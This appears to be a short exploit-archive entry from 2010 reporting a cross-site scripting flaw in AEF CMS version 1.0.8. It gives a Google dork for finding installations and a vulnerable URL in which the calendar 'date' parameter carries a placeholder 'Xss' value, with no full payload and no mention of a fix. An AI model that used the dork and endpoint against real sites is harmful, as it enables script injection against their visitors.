id: 11230
date: 03/09/2010
title: AEF Version 1.0.8 CMS Cross Site Scripting Vulnerability
author: Itsecteam
cves: 

========================================================
AEF Version 1.0.8 CMS Cross Site Scripting Vulnerability
========================================================

Topic : AEF Version 1.0.8
Bug Type : Cross Site Scripting
Credit : ItSecTeam 
Remote : Yes
Status   : Bug
Download Link :http://www.anelectron.com/downloads/
# Dork : Powered By AEF Version 1.0.8

########################## Exploit #############################
http://Site.Com/AEF/index.php?act=calendar&date=Xss



#  0day.today [2023-03-26]  #